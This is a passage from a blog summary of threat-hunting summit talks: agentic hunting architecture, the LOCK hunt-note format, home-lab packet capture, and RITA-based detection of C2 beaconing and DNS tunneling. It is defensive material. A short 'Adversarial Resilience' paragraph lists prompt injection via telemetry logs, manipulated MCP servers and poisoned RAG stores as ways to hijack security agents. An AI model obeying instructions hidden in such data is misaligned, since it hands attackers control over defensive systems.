telemetry and then using that probability in your hypothesis generation.</p>\n</li>\n<li class=\"\">\n<p><strong>On-Demand Analysis &amp; Retrieval:</strong> Leveraging frameworks like <em>CodeAct</em> or <em>Roberto Rodriguez's</em> concepts which helps in standardizing the tooling that the AI can use, then the AI can query and analyze data dynamically, after the generation of initial hypothesis.</p>\n</li>\n<li class=\"\">\n<p><strong>Relational Structuring (Knowledge Graphs):</strong> KGs are a very efficient way to elucidate the relationships between different data entities, so first process your telemetry into KGs before agents deal with it.</p>\n</li>\n<li class=\"\">\n<p><strong>Agentic Detection Engineering:</strong> After parsing IOCs from your intel feeds, use agents to run sigma detections on your telemetry.</p>\n</li>\n<li class=\"\">\n<p><strong>GUI / Vision Mediation (Legion)</strong></p>\n</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"2-shared-state\">2. Shared State<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#2-shared-state\" class=\"hash-link\" aria-label=\"Direct link to 2. Shared State\" title=\"Direct link to 2. Shared State\" translate=\"no\">​</a></h4>\n<p>We do standard LLM interactions by sending streaming tokens via an API call to the LLM and receive streaming tokens back as an answer, even when LLM runs a tool, its a json request to run the tool, the model can't really run the tool.\nSo the question arises that how do we preserve those values returned by different API calls that are running in parallel during hunts so that these values are accessible to future agents?\nThe answer to it is <mark>Knowledge Graphs</mark>.\nFaan highlights KGs as a highly effective way to map out this shared state, especially when tracking the complex connections between different entities during a hunt.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"3-tools\">3. Tools<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#3-tools\" class=\"hash-link\" aria-label=\"Direct link to 3. Tools\" title=\"Direct link to 3. Tools\" translate=\"no\">​</a></h4>\n<p>Hunters love their tools, and agents can be given the ability to use them either by asking the harness to perform the action or through automated workflows. Models do not execute the tools directly; the harness makes the API call on their behalf.</p>\n<ul>\n<li class=\"\"><strong>Inline Functions:</strong> Any inline function created in the harness can be exposed to the model.</li>\n<li class=\"\"><strong>Shell Use (CLI):</strong> Models are highly capable at CLI use due to its short, corrective feedback loop.</li>\n<li class=\"\"><strong>API Calls (Cross-Process):</strong> CLIs are a flexible and popular approach for making API calls, and the <em>Model Context Protocol (MCP)</em> can also be utilized.</li>\n<li class=\"\"><strong>GUI Automation:</strong> While classically viewed as expensive and slow, GUI automation is improving, allowing agents to learn by shadowing human interactions on the interface.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"4-orchestration\">4. Orchestration<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#4-orchestration\" class=\"hash-link\" aria-label=\"Direct link to 4. Orchestration\" title=\"Direct link to 4. Orchestration\" translate=\"no\">​</a></h4>\n<p>Default agent interactions often occur in a sequential manner, where a user asks a question and the model replies.<br>\nWhen scalling we want to move away from this sequential pattern, how to do that?</p>\n<ul>\n<li class=\"\"><strong>Parallelization:</strong> When scaling, independent tasks can be run in parallel to reduce latency.</li>\n<li class=\"\"><strong>Maker-Checker Design:</strong> Models can review each other's outputs, sometimes acting as an \"LLM as a judge.\"</li>\n<li class=\"\"><strong>Gates:</strong> Multiple agents can act as review gates in a workflow before critical decisions cascade and affect other areas.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"5-skills\">5. Skills<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#5-skills\" class=\"hash-link\" aria-label=\"Direct link to 5. Skills\" title=\"Direct link to 5. Skills\" translate=\"no\">​</a></h4>\n<p>Skills are the evolutionary progression from simple \"prompts.\" It's where we concretize the fuzzy knowledge of organization (what lives in a hunter's head) into <mark>Standard Operating Procedures (SOPs)</mark>.</p>\n<p><strong>Characteristics:</strong> They must be <em>executable</em>, <em>automatable</em>, and <em>atomic</em> (targeting a very specific method or objective).</p>\n<p><strong>Lifecycle:</strong> Skills should be composable (combinable), version-controlled, A/B tested, and shareable with the community.</p>\n<p><strong>Direction:</strong> You cannot just tell an agent to \"go find stuff.\" Skills provide the strict boundaries: <em>\"Here is the telemetry, here is the specific thing you are looking for, and here are the conditional workflows and reference scripts to use.\"</em></p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"6-context-engineering\">6. Context Engineering<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#6-context-engineering\" class=\"hash-link\" aria-label=\"Direct link to 6. Context Engineering\" title=\"Direct link to 6. Context Engineering\" translate=\"no\">​</a></h4>\n<p>Everything a base model knows lives in its pre-trained weights.\nThere are two flaws associated with it first is that the knowledge base lags behind by few months and another is that they are inherently flawed for enterprise defense because they know absolutely nothing about your specific organization, network architecture, or crown jewels.\nSo to give them the context, we can use mechanisms like <em>RAG (Retrieval-Augmented Generation)</em> or <em>DuckDB</em> to inject specific organizational context right when the agent needs it.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"7-feedback-loops\">7. Feedback Loops<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#7-feedback-loops\" class=\"hash-link\" aria-label=\"Direct link to 7. Feedback Loops\" title=\"Direct link to 7. Feedback Loops\" translate=\"no\">​</a></h4>\n<p>Introducing a skills based node that allows for intentional reflection following a hunt to give suggestions of how it can improve itself. To simplify, After a hunt another agent will look into the hunt and ask questions that what was missed during the hunt while also coming up with suggestions to improve itself.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"8-evaluations\">8. Evaluations<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#8-evaluations\" class=\"hash-link\" aria-label=\"Direct link to 8. Evaluations\" title=\"Direct link to 8. Evaluations\" translate=\"no\">​</a></h4>\n<p>When you alter the system's architecture, prompts, or skills, you need a way to measure the impact of those changes.\nEval ensures that system improvements are driven by <mark>hard metrics and verifiable performance data</mark>, rather than just relying on \"vibes\" or gut feelings about the AI's output.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"9-adversarial-resilience\">9. Adversarial Resilience<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#9-adversarial-resilience\" class=\"hash-link\" aria-label=\"Direct link to 9. Adversarial Resilience\" title=\"Direct link to 9. Adversarial Resilience\" translate=\"no\">​</a></h4>\n<p>As David mentioned in the keynote, introducing an AI agent layer inherently increases your attack surface.\nTherefore the threat actors can exploit the AI via prompt injection hidden within telemetry logs, manipulated MCP servers, or poisoned RAG databases.\nSo we should actively guard and remediate every vector where an attacker could theoretically influence or hijack the agent's reasoning.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"talk-2-avoiding-hunt-amnesia---building-a-memory-your-ai-can-use-by-sydney-marrone\">Talk 2: \"Avoiding Hunt Amnesia - Building a Memory Your AI Can Use\" by Sydney Marrone<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#talk-2-avoiding-hunt-amnesia---building-a-memory-your-ai-can-use-by-sydney-marrone\" class=\"hash-link\" aria-label=\"Direct link to Talk 2: &quot;Avoiding Hunt Amnesia - Building a Memory Your AI Can Use&quot; by Sydney Marrone\" title=\"Direct link to Talk 2: &quot;Avoiding Hunt Amnesia - Building a Memory Your AI Can Use&quot; by Sydney Marrone\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-2\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction-2\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>Sydney starts by presenting us the problem of <strong>Hunt Amnesia</strong>, what she simply means by that is our teams conduct a successful threat hunt and forget their own work; like 6 months or 1 year down the line, our teams are unable to remember that what queries were executed, the hypothesis or even what was the result of the hunt.\nShe highlights that in 2026, it's still one of the biggest things that lies between our threat hunting teams and AI augmented threat hunting.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-price-we-pay-when-suffering-from-hunt-amnesia\">What price we pay when suffering from Hunt Amnesia<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#what-price-we-pay-when-suffering-from-hunt-amnesia\" class=\"hash-link\" aria-label=\"Direct link to What price we pay when suffering from Hunt Amnesia\" title=\"Direct link to What price we pay when suffering from Hunt Amnesia\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Same Hypothesis, possibly hunted twice.</li>\n<li class=\"\">Same dead end, encountered twice.</li>\n<li class=\"\">New hunter who is onboarded has zero knowledge of previous hunts, so they are starting from zero.</li>\n</ul>\n<blockquote>\n<p><em>The <mark>Knowledge</mark> part in PEAK framework is the most important that most people skip. Knowledge is connected to all parts of the hunt, so it has to be compounded at each and every step of a threat hunt.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"agentic-threat-hunting-framework-athf\">Agentic Threat Hunting Framework (ATHF)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#agentic-threat-hunting-framework-athf\" class=\"hash-link\" aria-label=\"Direct link to Agentic Threat Hunting Framework (ATHF)\" title=\"Direct link to Agentic Threat Hunting Framework (ATHF)\" translate=\"no\">​</a></h3>\n<p>ATHF is a framework in which AI agents join us in threat hunting cycle as <strong>collaborators</strong>, they do not replace us, they enable us.\nNow ATHF needs structured hunt notes, ATHF only works if our past hunts are readable to a human or even a model, so we need structuring, this is where <strong>LOCK</strong> comes in.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"lock-format\">LOCK format<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#lock-format\" class=\"hash-link\" aria-label=\"Direct link to LOCK format\" title=\"Direct link to LOCK format\" translate=\"no\">​</a></h3>\n<p>The LOCK has four moves:</p>\n<ul>\n<li class=\"\"><strong>L</strong>earn - Contains what our hypothesis is and what's the threat context</li>\n<li class=\"\"><strong>O</strong>bserve - Contains what does the expected normal look like or what does suspicious look like</li>\n<li class=\"\"><strong>C</strong>heck - Contains our queries which were executed, their results, the analysis that was performed and conducted iterations.</li>\n<li class=\"\"><strong>K</strong>eep - Contains the decisions made that were part of the hunt, lesson learned from this hunt, and what we will improve in next hunt.</li>\n</ul>\n<p>These all four moves go in a single hunt file which is in markdown (<code>.md</code>) format.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"front-matter\">Front Matter<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#front-matter\" class=\"hash-link\" aria-label=\"Direct link to Front Matter\" title=\"Direct link to Front Matter\" translate=\"no\">​</a></h4>\n<p>The front matter is in YAML format, it contains facts like -</p>\n<ul>\n<li class=\"\">When did the hunt run?</li>\n<li class=\"\">What TTPs were executed?</li>\n<li class=\"\">What it is linked to?</li>\n<li class=\"\">What are the results?</li>\n<li class=\"\">etc..</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"body\">Body<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#body\" class=\"hash-link\" aria-label=\"Direct link to Body\" title=\"Direct link to Body\" translate=\"no\">​</a></h4>\n<p>Below front matter we have our body, this is where our LOCK format actually comes into play, we have our LOCK headings and their subsequent information as stated above.</p>\n<p>The above format makes it easier for AI to query it, the sections are predictable which helps our teams to stick with the structure and makes our job easier to maintain memory.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"using-ai-agents-to-query\">Using AI Agents to query<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#using-ai-agents-to-query\" class=\"hash-link\" aria-label=\"Direct link to Using AI Agents to query\" title=\"Direct link to Using AI Agents to query\" translate=\"no\">​</a></h3>\n<p>Just simply provide your AI agent the above created markdown files and ask questions related to your past hunts.\nMake a markdown hunt repo where you store all your previous hunts.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"takeaways\">Takeaways<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#takeaways\" class=\"hash-link\" aria-label=\"Direct link to Takeaways\" title=\"Direct link to Takeaways\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">LOCK keeps our previous hunts in order, giving them a proper structure and in turn making it easier for our teams to look back in time while also making it easier for AI agents to query and find information about our previous hunts.</li>\n<li class=\"\"><mark>Memory compounds over time</mark> which helps our team to gain more knowledge over time, also less reliance of new hunters over seniors.</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"lunch-demo-getting-started-with-network-based-threat-hunting-by-active-countermeasures-team\">Lunch Demo: \"Getting Started with Network-Based Threat Hunting\" by Active Countermeasures Team<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#lunch-demo-getting-started-with-network-based-threat-hunting-by-active-countermeasures-team\" class=\"hash-link\" aria-label=\"Direct link to Lunch Demo: &quot;Getting Started with Network-Based Threat Hunting&quot; by Active Countermeasures Team\" title=\"Direct link to Lunch Demo: &quot;Getting Started with Network-Based Threat Hunting&quot; by Active Countermeasures Team\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-3\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction-3\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>During the lunch break, Joe provided an introductory session on network threat hunting. The goal of this session was to help beginners collect, explore, and analyze network traffic in their home labs.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-shape-of-network-traffic\">The Shape of Network Traffic<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-shape-of-network-traffic\" class=\"hash-link\" aria-label=\"Direct link to The Shape of Network Traffic\" title=\"Direct link to The Shape of Network Traffic\" translate=\"no\">​</a></h3>\n<p>When analyzing network traffic, packets are built in layers to encapsulate specific tasks. A simple <code>curl</code> request requires around 11 packets just to fetch an HTML page. These are the layers that matter most during threat hunting:</p>\n<ul>\n<li class=\"\"><strong>Link Layer:</strong> Handles flow within your local network (e.g., your laptop to your router).</li>\n<li class=\"\"><strong>Internet Layer:</strong> Routes your traffic across the internet (e.g., local IP and server IP).</li>\n<li class=\"\"><strong>Transport Layer:</strong> Handles the conversation flow and ports (e.g., TCP handshakes and port numbers).</li>\n<li class=\"\"><strong>Application Layer:</strong> Carries the actual message, which is usually encrypted (e.g., HTTP/HTTPS traffic).</li>\n</ul>\n<p>Looking at raw packets (PCAPs) in Wireshark can be overwhelming due to the sheer volume of data.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-need-for-connection-summaries\">The Need for Connection Summaries<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-need-for-connection-summaries\" class=\"hash-link\" aria-label=\"Direct link to The Need for Connection Summaries\" title=\"Direct link to The Need for Connection Summaries\" translate=\"no\">​</a></h3>\n<blockquote>\n<p><em>Threat hunters live in the <mark>abstraction layer</mark>. We don't want to stare at individual packets; we want connection summaries to build a behavioral story.</em></p>\n</blockquote>\n<ul>\n<li class=\"\">Summaries tell us: Timestamp, Source/Destination IPs, Ports, Duration, and Bytes Transferred.</li>\n<li class=\"\">When combined with behavioral analysis (e.g., seeing a connection occur exactly every 20 seconds), we can hypothesize about what a device is actually doing.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"building-a-home-lab-pipeline\">Building a Home Lab Pipeline<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#building-a-home-lab-pipeline\" class=\"hash-link\" aria-label=\"Direct link to Building a Home Lab Pipeline\" title=\"Direct link to Building a Home Lab Pipeline\" translate=\"no\">​</a></h3>\n<p>Joe showcased a simple, affordable pipeline for analyzing network traffic at home:</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"1-capture-traffic-packet-capture\">1. Capture Traffic (Packet Capture)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#1-capture-traffic-packet-capture\" class=\"hash-link\" aria-label=\"Direct link to 1. Capture Traffic (Packet Capture)\" title=\"Direct link to 1. Capture Traffic (Packet Capture)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Passive Collection:</strong> Observing traffic on the side without modifying or decrypting it.</li>\n<li class=\"\"><strong>Local Machine:</strong> Use <code>tcpdump</code> (Linux/Mac) or <code>tshark</code> (Windows).</li>\n<li class=\"\"><strong>Travel Router:</strong> Use a cheap travel router, plug in a USB flash drive, run <code>tcpdump</code>, and connect all your devices. Let it run for 24 hours to capture your entire local network's traffic.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"2-generate-zeek-logs\">2. Generate Zeek Logs<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#2-generate-zeek-logs\" class=\"hash-link\" aria-label=\"Direct link to 2. Generate Zeek Logs\" title=\"Direct link to 2. Generate Zeek Logs\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Zui (formerly Brim):</strong> Drag and drop your <code>.pcap</code> file directly into the Zui UI, and it automatically converts it into Zeek logs.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"3-behavioral-analysis-with-rita\">3. Behavioral Analysis with RITA<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#3-behavioral-analysis-with-rita\" class=\"hash-link\" aria-label=\"Direct link to 3. Behavioral Analysis with RITA\" title=\"Direct link to 3. Behavioral Analysis with RITA\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">RITA is best run in Docker.</li>\n<li class=\"\">Import your Zeek logs into RITA to identify malicious behaviors like beacons or long connections, and export the results.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"4-querying-the-data-zed-lake\">4. Querying the Data (Zed Lake)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#4-querying-the-data-zed-lake\" class=\"hash-link\" aria-label=\"Direct link to 4. Querying the Data (Zed Lake)\" title=\"Direct link to 4. Querying the Data (Zed Lake)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">Import your Zeek logs and RITA output into a Zed Lake (using Zui).</li>\n<li class=\"\">Run queries to identify top talkers, longest connections, rare ports, and potential beacons.</li>\n<li class=\"\"><strong>Pro-tip:</strong> Use Generative AI (like Claude) to learn the Zeek/RITA schema and write the queries for you!</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"talk-3-threat-hunting-with-rita-a-behavioral-analysis-of-c2-traffic-by-hermon-kidane\">Talk 3: \"Threat Hunting with RITA: A Behavioral Analysis of C2 Traffic\" by Hermon Kidane<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#talk-3-threat-hunting-with-rita-a-behavioral-analysis-of-c2-traffic-by-hermon-kidane\" class=\"hash-link\" aria-label=\"Direct link to Talk 3: &quot;Threat Hunting with RITA: A Behavioral Analysis of C2 Traffic&quot; by Hermon Kidane\" title=\"Direct link to Talk 3: &quot;Threat Hunting with RITA: A Behavioral Analysis of C2 Traffic&quot; by Hermon Kidane\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-4\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction-4\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>Hermon starts the talk by referring to the <em>Pyramid of Pain</em>.\nAs we all know, the top layer of the Pyramid of Pain is <strong>TTPs</strong>, as it is the most difficult IOC to change for an attacker.\nTTPs = Behaviors of a threat actor.\nSo tracking down these behaviors makes our threat intelligence a lot better, and this is exactly where RITA comes in.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"rita-real-intelligence-threat-analytics\">RITA (Real Intelligence Threat Analytics)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#rita-real-intelligence-threat-analytics\" class=\"hash-link\" aria-label=\"Direct link to RITA (Real Intelligence Threat Analytics)\" title=\"Direct link to RITA (Real Intelligence Threat Analytics)\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">It is an open-source framework for detecting command and control communication through network traffic analysis.</li>\n<li class=\"\">The RITA framework ingests Zeek logs in TSV or JSON format, or PCAPs converted to Zeek logs for analysis.</li>\n<li class=\"\">It is developed by <em>Active Countermeasures</em>.</li>\n<li class=\"\">The analysis detects various behaviors:\n<ul>\n<li class=\"\">Beaconing</li>\n<li class=\"\">Long Connections</li>\n<li class=\"\">DNS Tunneling</li>\n<li class=\"\">Threat Intel</li>\n</ul>\n</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-to-feed-zeek-logs-to-rita\">How to feed Zeek logs to RITA<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#how-to-feed-zeek-logs-to-rita\" class=\"hash-link\" aria-label=\"Direct link to How to feed Zeek logs to RITA\" title=\"Direct link to How to feed Zeek logs to RITA\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"manual-way\">Manual Way<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#manual-way\" class=\"hash-link\" aria-label=\"Direct link to Manual Way\" title=\"Direct link to Manual Way\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">Convert the PCAP file or network capture that you have to Zeek logs.</li>\n<li class=\"\">Then feed it to RITA.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"for-automatedcontinuous-monitoring\">For automated/continuous monitoring<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#for-automatedcontinuous-monitoring\" class=\"hash-link\" aria-label=\"Direct link to For automated/continuous monitoring\" title=\"Direct link to For automated/continuous monitoring\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">Place a Zeek network sensor.</li>\n<li class=\"\">Feed that data to RITA.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"cli-tools-for-threat-hunting\">CLI Tools for Threat Hunting<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#cli-tools-for-threat-hunting\" class=\"hash-link\" aria-label=\"Direct link to CLI Tools for Threat Hunting\" title=\"Direct link to CLI Tools for Threat Hunting\" translate=\"no\">​</a></h3>\n<p>When analyzing Zeek logs, there are a few command-line tools that come in handy:</p>\n<ul>\n<li class=\"\"><code>zeek-cut</code>, <code>grep</code>, <code>awk</code></li>\n<li class=\"\"><strong>Threat Hunting Toolkit:</strong> Developed by <em>Ethan Robish</em> (BHIS). This toolkit is extremely useful as it standardizes interactions with different Zeek log formats (JSON/TSV) and provides great analysis scripts.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"analyzing-beacons\">Analyzing Beacons<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#analyzing-beacons\" class=\"hash-link\" aria-label=\"Direct link to Analyzing Beacons\" title=\"Direct link to Analyzing Beacons\" translate=\"no\">​</a></h3>\n<p>Beacons are persistent, regular callbacks from a compromised machine (victim) to the attacker's Command and Control (C2) server.</p>\n<ul>\n<li class=\"\">The victim repeatedly asks, <em>\"Do you have any jobs for me?\"</em></li>\n<li class=\"\">Often, the C2 server says <em>\"Go back to sleep\"</em>, but occasionally it will send instructions (e.g., run <code>whoami</code>).</li>\n<li class=\"\">Even when attackers mix in jitter (randomized timing), the traffic maintains a <mark>recognizable, regular cadence</mark> that cannot be easily masked on the network.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"using-rita-to-hunt\">Using RITA to Hunt<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#using-rita-to-hunt\" class=\"hash-link\" aria-label=\"Direct link to Using RITA to Hunt\" title=\"Direct link to Using RITA to Hunt\" translate=\"no\">​</a></h3>\n<p>Hermon demonstrated the practical steps for analyzing this traffic using RITA's CLI interface. If you're ever unsure of what to do, running <code>rita</code> by itself provides a helpful list of available commands.</p>\n<ol>\n<li class=\"\"><strong>Importing Data:</strong> Use <code>rita import --database=&lt;database_name&gt; --logs=&lt;path_to_logs&gt;</code> to ingest the Zeek logs.</li>\n<li class=\"\"><strong>Listing Databases:</strong> Use <code>rita list</code></li>\n<li class=\"\"><strong>Viewing Results:</strong> Use <code>rita view &lt;database_name&gt;</code> to explore the analyzed data.</li>\n</ol>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"key-rita-columns\">Key RITA Columns<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#key-rita-columns\" class=\"hash-link\" aria-label=\"Direct link to Key RITA Columns\" title=\"Direct link to Key RITA Columns\" translate=\"no\">​</a></h4>\n<p>When viewing the data, RITA provides a table sorted by severity, containing several insightful columns:</p>\n<ul>\n<li class=\"\"><strong>Severity:</strong> RITA calculates how malicious a connection is in the backend (Critical, High, Medium, Low).</li>\n<li class=\"\"><strong>Source Address:</strong> The internal host that is communicating outward.</li>\n<li class=\"\"><strong>Destination Address:</strong> The external domain/IP being contacted.</li>\n<li class=\"\"><strong>Beacon:</strong> The beacon score (indicating how regular and beacon-like the communication is).</li>\n<li class=\"\"><strong>Duration:</strong> Helpful for spotting long, persistent connections (another common malware behavior).</li>\n<li class=\"\"><strong>Subdomains:</strong> Indicates how many subdomains a top-level domain had in the logs. This is crucial for detecting <mark>DNS Tunneling</mark> (C2 over DNS).</li>\n<li class=\"\"><strong>Threat Intel:</strong> Flags domains matching any configured threat intelligence feeds.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"dns-tunneling\">DNS Tunneling<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#dns-tunneling\" class=\"hash-link\" aria-label=\"Direct link to DNS Tunneling\" title=\"Direct link to DNS Tunneling\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Concept:</strong> DNS Tunneling encapsulates C2 traffic or data exfiltration within DNS queries and responses.</li>\n<li class=\"\">Attackers use randomly generated subdomains to bypass perimeter defenses since DNS traffic is rarely blocked.</li>\n<li class=\"\">RITA detects this by analyzing the sheer volume of unique subdomains queried for a specific top-level domain.</li>\n<li class=\"\">A high subdomain count (e.g., thousands of queries to <code>*.malicious.com</code>) is a strong indicator of DNS tunneling.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"threat-modifiers--correlation\">Threat Modifiers &amp; Correlation<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#threat-modifiers--correlation\" class=\"hash-link\" aria-label=\"Direct link to Threat Modifiers &amp; Correlation\" title=\"Direct link to Threat Modifiers &amp; Correlation\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">RITA's extracted logs and signatures can be correlated with external Threat Intelligence platforms to level up your hunting.</li>\n<li class=\"\">By looking at specific threat modifiers, you can spot anomalies that stand out against known malicious patterns:\n<ul>\n<li class=\"\"><strong>Prevalence:</strong> Frequency of occurrence.</li>\n<li class=\"\"><strong>First Seen:</strong> Identifying if a beacon is brand new vs. something seen 6 months ago.</li>\n<li class=\"\"><strong>Rare Signatures:</strong> Looking for unusual JA3 hashes or User-Agent strings.</li>\n<li class=\"\"><strong>URI Mismatch.</strong></li>\n</ul>\n</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"network-threat-hunting-to-find-security-gaps\">Network Threat Hunting to Find Security Gaps<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#network-threat-hunting-to-find-security-gaps\" class=\"hash-link\" aria-label=\"Direct link to Network Threat Hunting to Find Security Gaps\" title=\"Direct link to Network Threat Hunting to Find Security Gaps\" translate=\"no\">​</a></h3>\n<p>Threat hunting doesn't always yield a malicious C2 server; in fact, most connections are benign. However, network hunting is incredibly valuable for identifying security gaps, maintaining inventory, and baselining.</p>\n<p><strong>Finding Poor Security Configs:</strong></p>\n<ul>\n<li class=\"\">Spotting cleartext passwords or unencrypted sensitive information.</li>\n<li class=\"\">Identifying IoT devices calling out to weird update servers.</li>\n<li class=\"\">Detecting internal scanning or probes.</li>\n<li class=\"\">Misconfigurations like Kerberos or SMB traffic being sent out to a public address (once identified, we can harden our systems!).</li>\n<li class=\"\">Performance issues caused by configs making every internal host send wrong service packets outbound.</li>\n</ul>\n<p><strong>Inventory &amp; Shadow IT:</strong></p>\n<ul>\n<li class=\"\">Network hunting can uncover Shadow IT, such as RMM (Remote Monitoring &amp; Management) tools running that you never use in your org.</li>\n<li class=\"\">The network is a great way to build your hardware and software inventory.</li>\n<li class=\"\">It provides visibility into IoT, embedded systems, and other network devices that might not even support EDR agents.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"general-takeaways\">General Takeaways<a 